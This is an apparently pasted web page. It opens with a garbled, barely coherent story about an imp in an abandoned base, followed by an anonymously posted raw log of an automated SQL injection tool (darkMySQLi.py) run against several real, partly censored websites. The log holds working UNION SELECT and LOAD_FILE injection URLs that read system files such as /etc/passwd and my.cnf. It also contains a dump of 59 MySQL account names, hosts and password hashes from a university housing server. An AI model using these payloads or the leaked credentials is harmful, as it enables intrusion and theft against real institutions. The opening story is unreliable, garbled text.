3. long summer day, when imp find cannot base, returned to. having gone, space marien hover in. "abandoned base", says he. dark lights and wide cornerdors haunt area. come to sliver hall, says "dark". walk up down to main enterance, coming from dark. enterance saying "red card". turn around to find missing imp. "HSSSSSSSSS!!!" imp said. spit fireball at player marien, duck to jump side off having gun pulled to fire wound in imp, says "OOOOO". fall to ground bleeding death. gun heard wound by base inhibitions, who come to life of sound and hear. says rooarrr, coming from behind enterance and around cornerdor, but having close away from marien. pulling gun and stepping on foot, look around cornerdor to fire more death at imp. facing green pot now, coming from left, run across yet step in and fall not completely. taken "red card" from opposing side, flailing back to red enterance and exavating card to hole, opening enterance!!! walking out, missledemon! run for life! finding of switch to wall on other room of end, turning same, ceiling fall on missledemon! base is clear of rain of inhibitions. having nice day afterall!! welcome home
4.  
5. enjoy contributory!

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
• 

Multiple hosts SQL injection hack log

This appears to be the output of an automatic SQL injection exploit tool run against a few sites. One particular university seems to have been hit hard.

Posted by Anonymous on Fri 17 Jul 22:52

1.  
2. |--------------------------------------------------|
3. | rsauron@gmail.com                         v1.6   |
4. |   1/2009      darkMySQLi.py                      |
5. |     -- Multi Purpose MySQL Injection Tool --     |
6. | Usage: darkMySQLi.py [options]                   |
7. |                      -h help       darkc0de.com  |
8. |--------------------------------------------------|
9.  
10. [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
11. [+] 19:13:05
12. [+] Evasion: + --
13. [+] Cookie: None
14. [+] SSL: No
15. [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
16. [+] Proxy Not Given
17. [+] Gathering MySQL Server Configuration...
18.         Database: lazio
19.         User: uisp@localhost
20.         Version: 4.0.25-log
21. |--------------------------------------------------|
22. | rsauron@gmail.com                         v1.6   |
23. |   1/2009      darkMySQLi.py                      |
24. |     -- Multi Purpose MySQL Injection Tool --     |
25. | Usage: darkMySQLi.py [options]                   |
26. |                      -h help       darkc0de.com  |
27. |--------------------------------------------------|
28.  
29. [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
30. [+] 19:15:02
31. [+] Evasion: + --
32. [+] Cookie: None
33. [+] SSL: No
34. [+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
35. [+] Proxy Not Given
36. [+] Gathering MySQL Server Configuration...
37.         Database: lazio
38.         User: uisp@localhost
39.         Version: 4.0.25-log[+] Beginning table and column fuzzer...
40. [+] Number of tables names to be fuzzed: 87
41. [+] Number of column names to be fuzzed: 125
42. [+] Searching for tables and columns...
43.  
44. [+] Found a table called: user
45.  
46. [+] Now searching for columns inside table "user"
47. [-] Done searching inside table "user" for columns!
48.  
49. [+] Found a table called: mysql.user
50.  
51. [+] Now searching for columns inside table "mysql.user"
52. [-] Done searching inside table "mysql.user" for columns!
53.  
54. [+] Found a table called: news
55.  
56. [+] Now searching for columns inside table "news"
57. [-] Done searching inside table "news" for columns!
58.  
59. [-] [19:23:35]
60. [-] Total URL Requests: 463
61. [-] Done
62.  
63. |--------------------------------------------------|
64. | rsauron@gmail.com                         v1.6   |
65. |   1/2009      darkMySQLi.py                      |
66. |     -- Multi Purpose MySQL Injection Tool --     |
67. | Usage: darkMySQLi.py [options]                   |
68. |                      -h help       darkc0de.com  |
69. |--------------------------------------------------|
70.  
71. [+] URL: http://www.uis[CENSORED].it/news.php?n=351+AND+1=2+UNION+SELECT+1,2,3,darkc0de,darkc0de
72. [+] 19:23:46
73. [+] Evasion: + --
74. [+] Cookie: None
75. [+] SSL: No
76. [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
77. [+] Proxy Not Given
78. [+] Gathering MySQL Server Configuration...
79.         Database: lazio
80.         User: uisp@localhost
81.         Version: 4.0.25-log
82. [+] Dumping data from database "lazio" Table "user"
83. [+] Column(s) ['id_user', 'password']
84. [+] Number of Rows: 3
85.  
86. [1] 1:43d97712a3d49112c478ff42e7a3cd69:
87. [2] 2:ba50d008b5b8e57b7764d8319369eeb6:
88. [3] 3:a472c4f62f70e7d432f4444b8c7c1642:
89.  
90. [-] [19:23:48]
91. [-] Total URL Requests: 5
92. [-] Done
93.  
94. |--------------------------------------------------|
95. | rsauron@gmail.com                         v1.6   |
96. |   1/2009      darkMySQLi.py                      |
97. |     -- Multi Purpose MySQL Injection Tool --     |
98. | Usage: darkMySQLi.py [options]                   |
99. |                      -h help       darkc0de.com  |
100. |--------------------------------------------------|
101.  
102. [+] URL: http://[CENSORED].edu/article.php?pid=5+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5
103. [+] 20:51:38
104. [+] Evasion: + --
105. [+] Cookie: None
106. [+] SSL: No
107. [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
108. [+] Proxy Not Given
109. [+] Gathering MySQL Server Configuration...
110.         Database: linux
111.         User: linux@web-4.uta.edu
112.         Version: 5.0.45-log
113.  
114. [+] Do we have Access to MySQL Database: NO
115.  
116. [-] MySQL user enumeration has been skipped!
117. [-] We do not have access to mysql DB on this target!
118.  
119. [+] Do we have Access to Load_File: NO
120.  
121. [-] Load_File Fuzzer has been by skipped!
122. [-] Load_File disabled on this target!
123.  
124. [-] [20:51:45]
125. [-] Total URL Requests: 3
126. [-] Done
127.  
128. |--------------------------------------------------|
129. | rsauron@gmail.com                         v1.6   |
130. |   1/2009      darkMySQLi.py                      |
131. |     -- Multi Purpose MySQL Injection Tool --     |
132. | Usage: darkMySQLi.py [options]                   |
133. |                      -h help       darkc0de.com  |
134. |--------------------------------------------------|
135.  
136. [+] URL: http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+darkc0de,2,3,4,5,darkc0de,darkc0de,8,darkc0de,10
137. [+] 20:53:38
138. [+] Evasion: + --
139. [+] Cookie: None
140. [+] SSL: No
141. [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
142. [+] Proxy Not Given
143. [+] Gathering MySQL Server Configuration...
144.         Database: news
145.         User: root@jupiter.housing.[CENSORED].edu
146.         Version: 4.1.20-log
147.  
148. [+] Do we have Access to MySQL Database: YES <-- w00t w00t
149.  
150. [+] Dumping MySQL user info. host:user:password[+] Number of users in the mysql.user table: 59
151. [0] localhost:root:1d7061767ec0f189
152. [1] trogdor:root:
153. [2] localhost::1d7061767ec0f189
154. [3] trogdor::
155. [4] *:root:1d7061767ec0f189
156. [5] %:root:1d7061767ec0f189
157. [6] localhost:nagios:62068042172418e8
158. [7] 128.104.56.%:infotech:1d7061767ec0f189
159. [8] %:housingwebserver:5d5deacd6a134128
160. [9] 146.151.2.%:infotech:1d7061767ec0f189
161. [10] *:housingwebserver:5d5deacd6a134128
162. [11] localhost.localdomain:root:1d7061767ec0f189
163. [12] %:wiki:71a82a1928270347
164. [13] localhost:wiki:71a82a1928270347
165. [14] localhost.localdomain:wiki:71a82a1928270347
166. [15] %:aesop:*DBE8FC7F0D38B886FF717773D166C88A53057AA7
167. [16] 10.146.%.%:aesop:*DBE8FC7F0D38B886FF717773D166C88A53057AA7
168. [17] jupiter%.housing.[CENSORED].edu:labman:*1BA54CAC1C9DBADFE5285D2FF6B943B0C9AC3351
169. [18] 128.104.56.68:labman:*1BA54CAC1C9DBADFE5285D2FF6B943B0C9AC3351
170. [19] jupiter%.housing.[CENSORED].edu:mrbs:764628e26aff0ffb
171. [20] 128.104.56.39:mrbs:764628e26aff0ffb
172. [21] Jupiter2.housing.[CENSORED].edu:mrbs:764628e26aff0ffb
173. [22] 128.104.56.39:labman:*1BA54CAC1C9DBADFE5285D2FF6B943B0C9AC3351
174. [23] 128.104.56.75:labman:4e2e57e527392663
175. [24] nathan-computer.housing.[CENSORED].edu:phpwebsite_admin:*FFE8FE6B11154482DD528AB354F12CD0925E41B8
176. [25] jupiter%.housing.[CENSORED].edu:phpwebsite_user:*D87CDE2186BA156ED1F6101FC04EDA373A867F35
177. [26] jupiter2.housing.[CENSORED].edu:phpwebsite_user:*D87CDE2186BA156ED1F6101FC04EDA373A867F35
178. [27] 146.151.2.4:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
179. [28] 128.104.56.39:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
180. [29] jupiter%.housing.[CENSORED].edu:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
181. [30] 128.104.56.75:housingstaff:*CC8F28B6B48C7367BACFEFBAA17042275F56824B
182. [31] jupiter%.housing.[CENSORED].edu:gaming_signup:*065954C938398AA43EBA15E9D52372CFAAB09847
183. [32] jupiter%.housing.[CENSORED].edu:trecs:*BB5B9FF3DDA2C4E94761CBB828CA7BE4518C5A24
184. [33] jupiter%.housing.[CENSORED].edu:trecs_read:*1753E38D50A040449857EE4ED9656FA31CC22502
185. [34] dev-web.housing.[CENSORED].edu:trecs_test:*B431DCFD19306523BED0B7711790F55CE3EE501D
186. [35] jupiter%.housing.[CENSORED].edu:comments:*CC967383FC43C582DCDB28EDCB44019E8287DAA7
187. [36] jupiter%.housing.[CENSORED].edu:webauthorwiki:*CCF9043583D9D699CF84C30FAED87624B22247F5
188. [37] jupiter%.housing.[CENSORED].edu:photos:*E66EA629FEC2AA58813A580ACCB2B1EBA942F745
189. [38] jupiter%.housing.[CENSORED].edu:classconnections:*A853E757A87A7DC90918CEB189DF07AEF97E7F05
190. [39] jupiter%.housing.[CENSORED].edu:rh_classes_read:*0DE4BF21764C68924261C00801A55E0D232FAAE2
191. [40] jupiter%.housing.[CENSORED].edu:reshall_classes:*487E8FD6FB0B7C95A6F0E251573D55AD9B08D672
192. [41] jupiter%.housing.[CENSORED].edu:interestconns:*93E27F1224D58430FA884F5F70B2EDE20B63DB5C
193. [42] jupiter%.housing.[CENSORED].edu:halldeskforum:*DB062717E8903030F561017B065F01A740AA2337
194. [43] jupiter%.housing.[CENSORED].edu:intconns_read:*E59C798F5717FA359DA1976077139ECB0D1CCB76
195. [44] jupiter%.housing.[CENSORED].edu:omega_read:*D98F1D2016D595FAE351D2D1971856F84DBE0FE3
196. [45] jupiter%.housing.[CENSORED].edu:omega:*5BF8DD2EE06D24BF323934998EBACBA74D1DF1A8
197. [46] jupiter%.housing.[CENSORED].edu:tutor_log:*D367B908E558098D85E781831A7829DA9CE22C52
198. [47] jupiter%.housing.[CENSORED].edu:reslife_testing:*15AE030DF51D192AA5A9CDDB7637092726114FE4
199. [48] %.housing.[CENSORED].edu:eweiss:*05391D93ACA052EF907794B253F0626D37DE93F0
200. [49] %housing.[CENSORED].edu:reslife_testing:
201. [50] %.housing.[CENSORED].edu:jpmielens:*7AC527A8617BDCEAAFC80CB8B8324747999B91E9
202. [51] %.housing.[CENSORED].edu:cherwinka:*E7FBCBE21AF99DE865DAD8C32059DE1F1332DE7E
203. [52] %.housing.[CENSORED].edu:efhanson:*74335AFE095A7B1948E0D3A2869E72B3DE07758D
204. [53] jupiter%.housing.[CENSORED].edu:events_read:*D3D085E058505D0D626133425CF466DB1763B3A9
205. [54] jupiter%.housing.[CENSORED].edu:eventscalendar:*5B9EA7F5EAC55A69EB9875648B47A49798224DCD
206. [55] jupiter%.housing.[CENSORED].edu:studygroups:*3133D9DF58AC305F79CA7FB14550F052C0B1E2F1
207. [56] %.housing.[CENSORED].edu:hwerner:*CD9CEFEBF56C7BD770A126DAAB50E156792457BE
208. [57] hsg-lae006.housing.[CENSORED].edu:root:*06D8B6D09ED6313722D02AC093B342CB35B3CD06
209. [58] %.housing.[CENSORED].edu:omega_dev:*3ED288D0DA311DF6100147818E80BA2F82C13676
210.  
211. [+] Do we have Access to Load_File: YES <-- w00t w00t
212.  
213. [+] Starting Load_File Fuzzer...
214. [+] Number of tables names to be fuzzed: 237
215.  
216. [!] Found /etc/passwd
217. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,LOAD_FILE(0x2f6574632f706173737764),LOAD_FILE(0x2f6574632f706173737764),8,LOAD_FILE(0x2f6574632f706173737764),10--
218. [!] Found /etc/hosts
219. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f686f737473),2,3,4,5,LOAD_FILE(0x2f6574632f686f737473),LOAD_FILE(0x2f6574632f686f737473),8,LOAD_FILE(0x2f6574632f686f737473),10--
220. [!] Found /etc/motd
221. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d6f7464),2,3,4,5,LOAD_FILE(0x2f6574632f6d6f7464),LOAD_FILE(0x2f6574632f6d6f7464),8,LOAD_FILE(0x2f6574632f6d6f7464),10--
222. [!] Found /etc/fstab
223. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6673746162),2,3,4,5,LOAD_FILE(0x2f6574632f6673746162),LOAD_FILE(0x2f6574632f6673746162),8,LOAD_FILE(0x2f6574632f6673746162),10--
224. [!] Found /etc/httpd/conf/httpd.conf
225. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),2,3,4,5,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),8,LOAD_FILE(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),10--
226. [!] Found /etc/my.cnf
227. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d792e636e66),2,3,4,5,LOAD_FILE(0x2f6574632f6d792e636e66),LOAD_FILE(0x2f6574632f6d792e636e66),8,LOAD_FILE(0x2f6574632f6d792e636e66),10--
228. [!] Found /etc/sysconfig/network-scripts/ifcfg-eth0
229. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),2,3,4,5,LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),8,LOAD_FILE(0x2f6574632f737973636f6e6669672f6e6574776f726b2d736372697074732f69666366672d65746830),10--
230. [!] Found /etc/redhat-release
231. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),2,3,4,5,LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),8,LOAD_FILE(0x2f6574632f7265646861742d72656c65617365),10--
232. [!] Found /etc/httpd/conf.d/php.conf
233. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),2,3,4,5,LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),8,LOAD_FILE(0x2f6574632f68747470642f636f6e662e642f7068702e636f6e66),10--
234. [!] Found /etc/group
235. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f67726f7570),2,3,4,5,LOAD_FILE(0x2f6574632f67726f7570),LOAD_FILE(0x2f6574632f67726f7570),8,LOAD_FILE(0x2f6574632f67726f7570),10--
236. [!] Found /etc/php.ini
237. [!] http://www.housing.[CENSORED].edu/resnet/news/story.php?id=123+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f7068702e696e69),2,3,4,5,LOAD_FILE(0x2f6574632f7068702e696e69),LOAD_FILE(0x2f6574632f7068702e696e69),8,LOAD_FILE(0x2f6574632f7068702e696e69),10--
238.  
239. [-] [21:00:32]
240. [-] Total URL Requests: 301
241. [-] Done
242.  
243. |--------------------------------------------------|
244. | rsauron@gmail.com                         v1.6   |
245. |   1/2009      darkMySQLi.py                      |
246. |     -- Multi Purpose MySQL Injection Tool --     |
247. | Usage: darkMySQLi.py [options]                   |
248. |                      -h help       darkc0de.com  |
249. |--------------------------------------------------|
250.  
251. [+] URL: http://www.[CENSORED].it/lettere_direttore/commenti.php?artid=1165+AND+1=2+UNION+SELECT+1,2,3,darkc0de,5,6,7
252. [+] 21:08:29
253. [+] Evasion: + --
254. [+] Cookie: None
255. [+] SSL: No
256. [+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
257. [+] Proxy Not Given
258. [+] Gathering MySQL Server Configuration...
259.         Database: [CENSORED]
260.         User: [CENSORED]@localhost
261.         Version: 5.0.45-log
262.  
263. [+] Do we have Access to MySQL Database: NO
264.  
265. [-] MySQL user enumeration has been skipped!
266. [-] We do not have access to mysql DB on this target!
267.  
268. [+] Do we have Access to Load_File: NO
269.  
270. [-] Load_File Fuzzer has been by skipped!
271. [-] Load_File disabled on this target!
272.  
273. [-] [21:08:32]
274. [-] Total URL Requests: 3
275. [-] Done

Bookmark this post with:

• 
• 
• 
• 
• 
• 
• 
• 
•